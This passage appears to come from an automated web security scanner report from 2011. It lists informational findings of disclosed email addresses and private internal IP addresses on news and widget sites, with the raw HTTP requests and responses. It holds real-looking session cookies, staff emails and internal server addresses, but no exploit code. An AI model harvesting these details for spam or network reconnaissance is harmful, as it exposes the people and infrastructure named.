encodeURIComponent("Comment about: "+this.m_ad.getProp("share"))+
'" class="meebo-0 meebo-277">
...[SNIP]...

19.7. http://w.sharethis.com/button/buttons.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://w.sharethis.com
Path:   /button/buttons.js

Issue detail

The following email address was disclosed in the response:

Request

GET /button/buttons.js HTTP/1.1
Host: w.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1
If-None-Match: "2a0f5-97fe-4a14eed717780"
If-Modified-Since: Wed, 20 Apr 2011 00:44:30 GMT

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 06 May 2011 17:26:10 GMT
ETag: "305eb-9ecb-4a29ec924b080"
Accept-Ranges: bytes
Content-Type: application/javascript
Date: Mon, 09 May 2011 13:59:30 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 40651

var cookie=new function(){return{setCookie:function(d,f,h){if(h){var c=new Date();c.setTime(c.getTime()+(h*24*60*60*1000));var a="; expires="+c.toGMTString()}else{var a=""}var b=d+"="+escape(f)+a;var
...[SNIP]...
lse};stLight.onReady=function(){stLight.readyRun=true;if(stLight.publisher==null){if(typeof(window.console)!=="undefined"){try{console.log("Please specify a ShareThis Publisher Key \nFor help, contact support@sharethis.com")}catch(a){}}}var b="share4x";if(switchTo5x){b="share5x"}if(stLight.hasButtonOnPage()){if(stLight.loadedFromBar){if(switchTo5x){b="bar_share5x"}else{b="bar_share4x"}}}else{if(stLight.loadedFromBar){b=
...[SNIP]...

19.8. http://widgets.twimg.com/j/2/widget.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.twimg.com
Path:   /j/2/widget.css

Issue detail

The following email address was disclosed in the response:

Request

GET /j/2/widget.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: widgets.twimg.com

Response

HTTP/1.0 200 OK
x-amz-id-2: yFPEo7/5CTnxmKnUEjXU1/OmPGPsNh0IMRRhNdN4WTdj8fNE1ntiR92x6Uowmhmg
x-amz-request-id: DD5E22500AC48FB0
Date: Sun, 08 May 2011 02:35:35 GMT
Expires: Sat, 27 Feb 2021 01:15:01 GMT+00:00
Last-Modified: Wed, 02 Mar 2011 01:15:13 GMT
ETag: "9842b420d8c91a4cbb004d17a5d54054"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 3430
Server: AmazonS3
Age: 127832
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 6f004e9b22ad9de1fb3ec72c46c20e0edfb2968f18caebf676529f334ba15b0d3d3f99de22c42f0a
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 c05eb8e83f57cc8dcfba97cefa36e0a4.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

/**
* Twitter - http://twitter.com
* Copyright (C) 2010 Twitter
* Author: Dustin Diaz (dustin@twitter.com)
*
* V 2.2.5 Twitter search/profile/faves/list widget
* http://twitter.com/widgets
* For full documented source see http://twitter.com/javascripts/widgets/widget.js
* Hosting and modifications of
...[SNIP]...

19.9. http://widgets.twimg.com/j/2/widget.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.twimg.com
Path:   /j/2/widget.js

Issue detail

The following email address was disclosed in the response:

Request

GET /j/2/widget.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: widgets.twimg.com

Response

HTTP/1.0 200 OK
x-amz-id-2: /PA731toNx972OXjAmpMncbSDYG7pU/61LXV/1IwSSaURoBa3/0W99IUiTyaOKij
x-amz-request-id: 1F8F72FFC4060381
Date: Fri, 06 May 2011 15:21:09 GMT
Last-Modified: Fri, 08 Apr 2011 20:34:17 GMT
ETag: "8f109f7ba100454bc391fc07377c1aed"
Accept-Ranges: bytes
Content-Type: application/javascript
Content-Length: 31383
Server: AmazonS3
Age: 6297
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: bb7daf63a24e2f7ef067c9dcee39feb3947e844dcd48733f933c22c4b9340d8331a9b166597bff9b
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 c05eb8e83f57cc8dcfba97cefa36e0a4.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

/**
* Twitter - http://twitter.com
* Copyright (C) 2010 Twitter
* Author: Dustin Diaz (dustin@twitter.com)
*
* V 2.2.5 Twitter search/profile/faves/list widget
* http://twitter.com/widgets
* For full documented source see http://twitter.com/javascripts/widgets/widget.js
* Hosting and modifications of
...[SNIP]...

19.10. http://www.clashmusic.com/sites/all/modules/shadowbox/shadowbox/src/skin/classic/skin.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /sites/all/modules/shadowbox/shadowbox/src/skin/classic/skin.css

Issue detail

The following email address was disclosed in the response:

Request

GET /sites/all/modules/shadowbox/shadowbox/src/skin/classic/skin.css HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5079a7bd09304b581fb1d164353615c5=h78ot6e3amth8f4pu158nlhcb2

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:33 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 12 Jan 2009 15:30:18 GMT
ETag: "7002e0-1474-c8b51680"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=1209600
Expires: Mon, 23 May 2011 14:00:33 GMT
Connection: close
Content-Type: text/css
Content-Length: 5236

/**
* The "classic" theme CSS for Shadowbox.
*
* This file is part of Shadowbox.
*
* Shadowbox is an online media viewer application that supports all of the
* web's most popular media pub
...[SNIP]...
<mjijackson@gmail.com>
...[SNIP]...

19.11. http://www.clashmusic.com/sites/all/modules/shadowbox/shadowbox/src/skin/classic/skin.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /sites/all/modules/shadowbox/shadowbox/src/skin/classic/skin.js

Issue detail

The following email address was disclosed in the response:

Request

GET /sites/all/modules/shadowbox/shadowbox/src/skin/classic/skin.js HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5079a7bd09304b581fb1d164353615c5=h78ot6e3amth8f4pu158nlhcb2

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:38 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 12 Jan 2009 15:30:18 GMT
ETag: "7002df-da7-c8b51680"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=1209600
Expires: Mon, 23 May 2011 14:00:38 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 3495

/**
* The "classic" theme markup for Shadowbox.
*
* This file is part of Shadowbox.
*
* Shadowbox is an online media viewer application that supports all of the
* web's most popular media publis
...[SNIP]...
<mjijackson@gmail.com>
...[SNIP]...

19.12. http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floridatoday.com
Path:   /article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages

Issue detail

The following email address was disclosed in the response:

Request

GET /article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages HTTP/1.1
Host: www.floridatoday.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Last-Modified: Mon, 09 May 2011 13:55:06 GMT
X-Processing-begin: MOC-WN0483, on site A9 (2011-05-09 09:55:06:002)
Content-Type: text/html
X-Processing-finished: MOC-WN0483, on site A9 (2011-05-09 09:55:06:111)
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:28 GMT
Connection: close
Content-Length: 119897

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:meebo="http://www.meebo.com" lang="en">


<head>
       <title>Highly publicized murd
...[SNIP]...
<a href="mailto:jtorres@floridatoday.com">jtorres@floridatoday.com</a>
...[SNIP]...

19.13. http://www.floridatoday.com/odygel/lib/legacy/GDN/GDNpreload.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floridatoday.com
Path:   /odygel/lib/legacy/GDN/GDNpreload.js

Issue detail

The following email address was disclosed in the response:

Request

GET /odygel/lib/legacy/GDN/GDNpreload.js HTTP/1.1
Host: www.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Fri, 29 Apr 2011 16:50:42 GMT
Accept-Ranges: bytes
ETag: "01d66938d6cc1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:40 GMT
Connection: close
Content-Length: 64756

// define global settings
var gdn_AuthService = "GDNAuth.ashx",
gdn_ExtrovertService = "Extrovert/GDNExtrovert.ashx",
gdn_MaxSessions = 10,
gdn_RegService = "GCION.ashx",
gdn_Vers
...[SNIP]...
nable to register you. Please try again later.",
CompanySizeNone: "You must select your company size",
CountryNone: "You must select your country",
EmailInvalid: "Your email address is invalid (Ex. username@domain.com)",
EmailMax: "Your email address must be 100 characters or less",
EmailNone: "You must enter your email address",
ErrorHeader: "The following errors occurred in each required field:",
FirstNameMax
...[SNIP]...

19.14. http://www.floridatoday.com/odygel/lib/userauth/validateform.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floridatoday.com
Path:   /odygel/lib/userauth/validateform.js

Issue detail

The following email address was disclosed in the response:

Request

GET /odygel/lib/userauth/validateform.js HTTP/1.1
Host: www.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; GCIONPN=AAAAOn5zZWdtZW50czpEMDg3MzRfNzAwMDh8RDA4NzM0XzcyMDc4

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 11 Oct 2010 19:11:08 GMT
Accept-Ranges: bytes
ETag: "0ae11f7869cb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:44 GMT
Connection: close
Content-Length: 7140

if (typeof GEL == 'undefined' || !GEL ) GEL= { util: new Object() };
//GEL.namespace("widget");
//derived from Paid content ValidateRegistration script
(function(){
GEL.widget.ValidateRegistrati
...[SNIP]...
s must be 100 characters or less");
           errordiv.push(emailObj);
       }
       else if (!GDN.Validate.IsEmail(emailObj.value))
       {
           valid = false;
           errorArray.push("Your email address is invalid (Ex. username@domain.com");
           errordiv.push(emailObj);
       }
       
       
                       if (firstBadObj==null && valid==false) {
           firstBadObj = emailObj;
       }

       gendermaleObj = get_object("ody_ac_gendermale");
       genderf
...[SNIP]...
s must be 100 characters or less");
           errordiv.push(emailObj);
       }
       else if (!GDN.Validate.IsEmail(emailObj.value))
       {
           valid = false;
           errorArray.push("Your email address is invalid (Ex. username@domain.com");
           errordiv.push(emailObj);
       }
       
   
       if (firstBadObj==null && valid==false) {
           firstBadObj = emailObj;
       }
       passwordObj = get_object("ody_la_password");
       
       if (GDN.IsNullOrEmpty(pa
...[SNIP]...

19.15. http://www.indianasnewscenter.com/includes/granite_js_lib.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.indianasnewscenter.com
Path:   /includes/granite_js_lib.js

Issue detail

The following email address was disclosed in the response:

Request

GET /includes/granite_js_lib.js HTTP/1.1
Host: www.indianasnewscenter.com
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: click_mobile=0; __qseg=Q_D|Q_T

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 08 May 2011 06:52:55 GMT
Vary: Accept-Encoding
X-Server-Name: sj-c14-r1-u7
Content-Type: text/javascript;charset=utf-8
Date: Mon, 09 May 2011 13:59:05 GMT
Connection: close
Set-Cookie: click_mobile=0
Content-Length: 54380

/**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @p
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

19.16. http://www.irishtimes.com/js/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.irishtimes.com
Path:   /js/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/s_code.js HTTP/1.1
Host: www.irishtimes.com
Proxy-Connection: keep-alive
Referer: http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 29635
Date: Mon, 09 May 2011 05:47:02 GMT
Expires: Mon, 09 May 2011 17:47:02 GMT
Cache-Control: max-age = 43200
Connection: Keep-Alive
Via: NS-CACHE-6.0: 101
ETag: "6fd4399-5181-4d41a84e"
Server: Apache
Last-Modified: Thu, 27 Jan 2011 17:15:58 GMT
Accept-Ranges: bytes
Content-Length: 20865
Keep-Alive: timeout=300, max=1995
Content-Type: application/x-javascript

/* SiteCatalyst code version: H.15.1.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
var s_account="itgirishtimesprod"
var s=s_gi(s_account)
/********************
...[SNIP]...
)`i+s.hav()+q+(qs?qs:s.rq(^C)),0,id,ta);qs`h;`Wm('t')`5s.p"
+"_r)s.p_r()}^7(qs);^y`o(@g;`k@g`L^9,`F$51',vb`R@G=^D=s.`N`g=s.`N^K=`E^z^x=s.ppu=^n=^nv1=^nv2=^nv3`h`5$t)`E^z@G=`E^zeo=`E^z`N`g=`E^z`N^K`h`5!id@Us.tc){s.tc=1;s.flush`Z()}`2$h`Atl`0o,t,n,vo`1;s.@G=@uo"
+"`R`N^K=t;s.`N`g=n;s.t(@g}`5pg){`E^zco`0o){`K@J\"_\",1,#8`2@uo)`Awd^zgs`0$P{`K@J$k1,#8`2s.t()`Awd^zdc`0$P{`K@J$k#8`2s.t()}}@2=(`E`I`X`8`4@ss@b0`Rd=^
...[SNIP]...

19.17. http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.irishtimes.com
Path:   /newspaper/theticket/2011/0506/1224296203710.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /newspaper/theticket/2011/0506/1224296203710.html HTTP/1.1
Host: www.irishtimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 100
Date: Mon, 09 May 2011 13:59:03 GMT
Expires: Mon, 09 May 2011 14:04:03 GMT
Cache-Control: max-age = 300
Connection: Keep-Alive
Via: NS-CACHE-6.0: 101
ETag: "12c78d-f63a-4dc7eff3"
Server: Apache
Last-Modified: Mon, 09 May 2011 13:45:23 GMT
Accept-Ranges: bytes
Keep-Alive: timeout=300, max=1994
Content-Type: text/html; charset=US-ASCII
Cache-Control: private
Content-Length: 63034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=US-ASC
...[SNIP]...
<option value="tclaytonlea@irishtimes.com">Rock/Pop</option><option value="jimcarroll@irishtimes.com">Clubs</option><option value="tclaytonlea@irishtimes.com">Roots</option><option value="slong@irishtimes.com">
...[SNIP]...
<option value="rcomiskey@irishtimes.com">Jazz</option><option value="mdervan@irishtimes.com">
...[SNIP]...
<option value="pcrawley@irishtimes.com">Theatre</option><option value="adunne@irishtimes.com">Art</option><option value="sthompson@irishtimes.com">Children</option><option value="bboyd@irishtimes.com">Comedy</option><option value="smacreamoinn@irishtimes.com">Dance</option><option value="cdillon@irishtimes.com">
...[SNIP]...
<input type="hidden" name="bylineemail" value="features@irishtimes.com">
...[SNIP]...

19.18. http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thevine.com.au
Path:   /music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx HTTP/1.1
Host: www.thevine.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=kxuwnfahnyntrb45nyzhom55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 269864


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...
<a id="ctl00_holderBody_ctl00_ContentScoopControl_lnkScoop" href="mailto:citizens@thevine.com.au">citizens@thevine.com.au</a>
...[SNIP]...

20. Private IP addresses disclosed
There are 48 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.
20.1. http://api.facebook.com/restserver.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.indianasnewscenter.com%2Fnews%2Flocal%2FAt-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Mon, 09 May 2011 07:01:10 -0700
Pragma:
X-FB-Rev: 375286
X-FB-Server: 10.32.29.120
X-Cnection: close
Date: Mon, 09 May 2011 13:59:10 GMT
Content-Length: 430

fb_sharepro_render([{"url":"http:\/\/www.indianasnewscenter.com\/news\/local\/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html","normalized_url":"http:\/\/www.indianasnewscenter.
...[SNIP]...

20.2. http://connect.facebook.net/en_GB/all.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://connect.facebook.net
Path:   /en_GB/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /en_GB/all.js HTTP/1.1
Host: connect.facebook.net
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "335def1c7b2d67524dcb7a3631c54187"
X-FB-Server: 10.27.126.104
X-Cnection: close
Cache-Control: public, max-age=834
Expires: Mon, 09 May 2011 14:15:08 GMT
Date: Mon, 09 May 2011 14:01:14 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 117950

/*1304912404,169573992,JIT Construction: v375286,en_GB*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...

20.3. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /js/api_lib/v0.4/FeatureLoader.js.php/en_US

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js/api_lib/v0.4/FeatureLoader.js.php/en_US HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "04b44d52c20529054ca11e5e32607c9c"
X-FB-Server: 10.32.135.129
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=419
Expires: Mon, 09 May 2011 14:06:29 GMT
Date: Mon, 09 May 2011 13:59:30 GMT
Connection: close
Content-Length: 18453

/*1304703338,169904001,JIT Construction: v374976,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

20.4. http://static.ak.fbcdn.net/connect/xd_proxy.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php?version=0 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.138.17.182
Vary: Accept-Encoding
Cache-Control: public, max-age=1505
Expires: Mon, 09 May 2011 14:24:14 GMT
Date: Mon, 09 May 2011 13:59:09 GMT
Connection: close
Content-Length: 3017

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

20.5. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/uBEmPS-MH2t.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y3/r/uBEmPS-MH2t.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y3/r/uBEmPS-MH2t.js HTTP/1.1
